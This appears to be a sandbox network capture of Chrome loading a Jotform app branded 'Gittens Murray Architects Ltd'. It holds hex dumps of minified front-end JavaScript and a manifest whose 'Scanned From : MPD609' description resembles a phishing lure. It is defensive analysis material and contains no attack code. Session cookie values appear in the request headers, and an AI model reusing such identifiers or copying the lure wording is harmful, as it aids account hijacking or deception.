                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 65 69 67 68 74 3a 6c 7d 2c 63 29 7d 2c 64 29 2c 61 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 32 2c 31 38 2e 31 37 4c 38 2e 38 33 2c 31 35 4c 37 2e 34 32 2c 31 36 2e 34 31 4c 31 32 2c 32 31 4c 31 36 2e 35 39 2c 31 36 2e 34 31 4c 31 35 2e 31 37 2c 31 35 4d 31 32 2c 35 2e 38 33 4c 31 35 2e 31 37 2c 39 4c 31 36 2e 35 38 2c 37 2e 35 39 4c 31 32 2c 33 4c 37 2e 34 31 2c 37 2e 35 39 4c 38 2e 38 33 2c 39 4c 31 32 2c 35 2e 38 33 5a 22 7d 29 29 7d 7d 2c 36 32 30 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c
                                                                                                                                                                                                                                            Data Ascii: eight:l},c)},d),a.default.createElement("path",{d:"M12,18.17L8.83,15L7.42,16.41L12,21L16.59,16.41L15.17,15M12,5.83L15.17,9L16.58,7.59L12,3L7.41,7.59L8.83,9L12,5.83Z"}))}},62065:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 76 61 72 20 63 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 22 6e 61 6d 65 22 29 2c 64 3d 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 63 29 3b 74 2e 67 65 74 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 64 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 5d 3b 72 65 74 75 72 6e 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69
                                                                                                                                                                                                                                            Data Ascii: unction u(e){return e&&e.__esModule?e:{default:e}}var c=(0,a.default)("name"),d=(0,s.default)(c);t.getActiveFeatureNames=(0,o.default)((0,r.default)(d),(function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[];return(0,i.default)((functi
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 67 65 74 49 73 45 6e 61 62 6c 65 64 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 69 28 6e 28 35 32 31 38 30 29 29 2c 6f 3d 69 28 6e 28 35 38 37 35 34 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 76 61 72 20 61 3d 74 2e 67 65 74 49 73 45 6e 61 62 6c 65 64 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 5d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31
                                                                                                                                                                                                                                            Data Ascii: ule",{value:!0}),t.getIsEnabled=void 0;var r=i(n(52180)),o=i(n(58754));function i(e){return e&&e.__esModule?e:{default:e}}var a=t.getIsEnabled=(0,o.default)((function(){var e,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],n=arguments.length>1
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 30 38 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 69 73 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 2c 6f 3d 6e 28 35 38 37 35 34 29 2c 69 3d 28 72 3d 6f 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 74 2e 69 73 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 3d 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                            Data Ascii: 0817:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.isActiveFeatureName=void 0;var r,o=n(58754),i=(r=o)&&r.__esModule?r:{default:r};t.isActiveFeatureName=(0,i.default)((function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 6f 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 76 61 72 20 61 3d 74 2e 46 65 61 74 75 72 65 54 6f 67 67 6c 65 73 43 6f 6e 74 65 78 74 3d 69 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 5b 5d 29 2c 73 3d 61 2e 43 6f 6e 73 75 6d 65 72 2c 6c 3d 61 2e 50 72 6f 76 69 64 65 72 3b 74 2e 43 6f 6e 73 75 6d 65 72 3d 73 2c 74 2e 50 72 6f 76 69 64 65 72 3d 6c 7d 2c 33 35 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29
                                                                                                                                                                                                                                            Data Ascii: o)&&r.__esModule?r:{default:r};var a=t.FeatureTogglesContext=i.default.createContext([]),s=a.Consumer,l=a.Provider;t.Consumer=s,t.Provider=l},35687:function(e,t){"use strict";function n(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 76 61 72 20 6f 3d 65 2e 69 6e 63 6c 75 64 65 73 28 6c 29 3f 74 3a 61 3b 72 65 74 75 72 6e 20 74 3f 72 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2c 6e 75 6c 6c 29 3a 6e 28 7b 66 65 61 74 75 72 65 73 3a 65 7d 29 7d 29 29 7d 29 2e 70 72 6f 70 54 79 70 65 73 3d 7b 61 63 74 69 76 65 43 6f 6d 70 6f 6e 65 6e 74 3a 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 63 68 69 6c 64 72 65 6e 3a 6f 2e 64 65 66 61 75 6c 74 2e 6f 6e 65 4f 66 54 79 70 65 28 5b 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 6f 2e 64 65 66 61 75 6c 74 2e 6e 6f 64 65 5d 29 2c 69 6e 61 63 74 69 76 65 43 6f 6d 70 6f 6e 65 6e 74 3a 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 6e 61 6d 65 3a 6f 2e 64 65 66 61 75 6c 74 2e 73 74 72 69 6e 67 7d 7d 2c 32 38 37 38 33 3a 66 75
                                                                                                                                                                                                                                            Data Ascii: var o=e.includes(l)?t:a;return t?r.default.createElement(o,null):n({features:e})}))}).propTypes={activeComponent:o.default.func,children:o.default.oneOfType([o.default.func,o.default.node]),inactiveComponent:o.default.func,name:o.default.string}},28783:fu


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            24192.168.2.1749704104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC649OUTGET /app/250092704521347/manifest.json HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            jf-trace-id: 6a04495f73331956
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347; expires=Mon, 10 Feb 2025 12:35:59 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:35:59 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/manifest.json
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC95INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 35 63 38 38 62 33 61 35 65 37 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: via: 1.1 googleCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb5c88b3a5e7c-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 37 36 62 0d 0a 7b 22 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 73 63 6f 70 65 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 6f 74 66 6f 72 6d 5f 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 74 68 65 6d 65 5f 63 6f
                                                                                                                                                                                                                                            Data Ascii: 76b{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_co
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC537INData Raw: 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 31 39 32 26 68 65 69 67 68 74 3d 31 39 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22 31 39 32 78 31 39 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 5c 2f 70 6e 67 22 7d 2c 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 35 31 32 26 68 65 69 67 68 74 3d 35 31 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22
                                                                                                                                                                                                                                            Data Ascii: 00e1e431c.png?width=192&height=192&time=1736507717","sizes":"192x192","type":"image\/png"},{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=512&height=512&time=1736507717","sizes":"
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            25192.168.2.1749729172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC387OUTGET /s/portal/674ac14411e/static/js/index.f047cc75.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC430INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:59 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 3551601
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:15 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "cfbd9668b652a0b7ef999724288bf504"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 262
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5caef1bf797-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC939INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 33 35 36 62 36 35 36 2d 64 35 62 37 2d 35 30 63 31 2d 62 63 35 33 2d 36 62 31 35 35 39 62 31 35 39 64 63 22 29 7d 63 61 74 63
                                                                                                                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e356b656-d5b7-50c1-bc53-6b1559b159dc")}catc
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 65 74 41 70 70 56 65 72 73 69 6f 6e 53 65 6c 65 63 74 6f 72 29 2c 79 3d 28 30 2c 69 2e 76 39 29 28 68 2e 5a 2e 67 65 74 4c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 29 2c 76 3d 70 2c 43 3d 21 21 75 3b 72 65 74 75 72 6e 20 67 3d 3d 3d 6d 2e 5a 5b 30 5d 3f 28 30 2c 6f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 57 72 61 70 70 65 72 3a 76 2c 74 69 74 6c 65 3a 66 2c 6c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 3a 79 7d 29 3a 28 30 2c 6f 2e 6a 73 78 29 28 73 2e 5a 2c 7b 74 79 70 65 3a 43 3f 6c 2e 6e 72 2e 69 6d 61 67 65 3a 74 2c 62 67 43 6f 6c 6f 72 3a 6e 2c 62 67 55 52 4c 3a 43 3f 75 3a 64 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 61 2c 73 76 67 52 65 66 3a 72 2c 61 6c 74 3a 60 24 7b 66 7d 20 49 63 6f 6e 60 2c 57 72 61 70 70 65 72 3a 76 2c 77 69 74 68 42 6f 72 64 65 72 3a 65 7d 29 7d
                                                                                                                                                                                                                                            Data Ascii: etAppVersionSelector),y=(0,i.v9)(h.Z.getLogoProperties),v=p,C=!!u;return g===m.Z[0]?(0,o.jsx)(c.Z,{Wrapper:v,title:f,logoProperties:y}):(0,o.jsx)(s.Z,{type:C?l.nr.image:t,bgColor:n,bgURL:C?u:d,iconColor:a,svgRef:r,alt:`${f} Icon`,Wrapper:v,withBorder:e})}
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 6e 28 39 34 36 35 33 29 2c 61 3d 28 6e 28 33 37 38 39 37 29 2c 6e 28 31 31 32 36 38 29 29 2c 72 3d 6e 28 36 35 39 36 34 29 2c 69 3d 6e 28 39 39 32 31 36 29 3b 63 6f 6e 73 74 20 6c 3d 28 7b 57 72 61 70 70 65 72 3a 65 2c 77 69 74 68 42 6f 72 64 65 72 3a 74 2c 74 69 74 6c 65 3a 6e 2c 6c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 6c 6f 67 6f 54 79 70 65 3a 72 2c 6c 6f 67 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 6c 2c 6c 6f 67 6f 55 52 4c 3a 73 2c 6c 6f 67 6f 53 76 67 52 65 66 3a 63 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 64 7d 3d 61 2c 75 3d 60 24 7b 6e 7d 20 4c 6f 67 6f 60 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 6a 73 78 29 28 69 2e 5a 2c 7b 74 79 70 65 3a 72 2c 62 67 43 6f 6c
                                                                                                                                                                                                                                            Data Ascii: ){"use strict";var o=n(94653),a=(n(37897),n(11268)),r=n(65964),i=n(99216);const l=({Wrapper:e,withBorder:t,title:n,logoProperties:a})=>{const{logoType:r,logoBackground:l,logoURL:s,logoSvgRef:c,iconColor:d}=a,u=`${n} Logo`;return(0,o.jsx)(i.Z,{type:r,bgCol
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 79 47 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 31 31 37 35 39 29 3b 63 6f 6e 73 74 20 61 3d 6f 2e 5a 50 2e 64 69 76 60 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 20 74 6f 70 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 32 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 33 39 2c 20 34 31 2c 20 35 35 2c 20 30 2e 36 31 29 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e
                                                                                                                                                                                                                                            Data Ascii: ction(){return a},yG:function(){return i}});var o=n(11759);const a=o.ZP.div` position: fixed; left: 0; top: 0; width: 100%; height: 100%; z-index: 1002; background-color: rgba(39, 41, 55, 0.61); display: flex; flex-direction: column; align
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 31 32 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 66 39 31 61 61 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 35 65 6d 20 30 3b 0a 20 20 7d 0a 0a 20 20 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 2d 6d 6f 64 61 6c 2d 63 6c 6f 73 65 42 74 6e 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 31 70 78 20 32 34 70 78 20 31 38 70 78 20 30 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 66 6c 65 78
                                                                                                                                                                                                                                            Data Ascii: style: normal; line-height: normal; letter-spacing: 0.12px; color: #8f91aa; margin: 0.25em 0; } .announcement-modal-closeBtn { padding: 0; height: auto; margin: 21px 24px 18px 0; display: block; border: 0; flex
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 31 31 32 36 38 29 2c 63 3d 6e 28 33 39 36 34 31 29 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 6c 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 28 65 2c 74 29 3d 3e 7b 76 61 72 7b 44 69 61 6c 6f 67 52 65 6e 64 65 72 65 72 3a 6e 2c 43 6f 6e 74 65 6e 74 52 65 6e 64 65 72 65 72 3a 6c 2c 48 65 61 64 65 72 52 65 6e 64 65 72 65 72 3a 73 2c 46 6f 6f 74 65 72 52 65 6e 64 65 72 65 72 3a 64 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 75 7d 3d 65 2c 70 3d 28 30 2c 72 2e 5f 29 28 65 2c 5b 22 44 69 61 6c 6f 67 52 65 6e 64 65 72 65 72 22 2c 22 43 6f 6e 74 65 6e 74 52 65 6e 64 65 72 65 72 22 2c 22 48 65 61 64 65 72 52 65 6e 64 65 72 65 72 22 2c 22 46 6f 6f 74 65 72 52 65 6e 64 65 72 65 72 22 2c 22 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 22 5d 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73
                                                                                                                                                                                                                                            Data Ascii: 11268),c=n(39641);const d=(0,l.forwardRef)(((e,t)=>{var{DialogRenderer:n,ContentRenderer:l,HeaderRenderer:s,FooterRenderer:d,onModalClose:u}=e,p=(0,r._)(e,["DialogRenderer","ContentRenderer","HeaderRenderer","FooterRenderer","onModalClose"]);return(0,i.js
                                                                                                                                                                                                                                            2025-01-10 12:35:59 UTC1369INData Raw: 7b 28 7b 63 6f 6c 6f 72 3a 65 7d 29 3d 3e 63 2e 69 76 60 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 24 7b 65 7d 3b 60 7d 0a 0a 20 20 20 20 73 76 67 20 7b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 39 70 78 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 39 70 78 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 60 2c 75 3d 65 3d 3e 7b 76 61 72 7b 69 63 6f 6e 3a 74 2c 49 63 6f 6e 52 65 6e 64 65 72 65 72 3a 6e 7d 3d 65 2c 6c 3d 28 30 2c 72 2e 5f 29 28 65 2c 5b 22 69 63 6f 6e 22 2c 22 49 63 6f 6e 52 65 6e 64 65 72 65 72 22 5d 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 64 2c 28 30 2c 61 2e 5f 29 28 28 30 2c 6f 2e 5f 29 28 7b 7d 2c 6c 29 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65
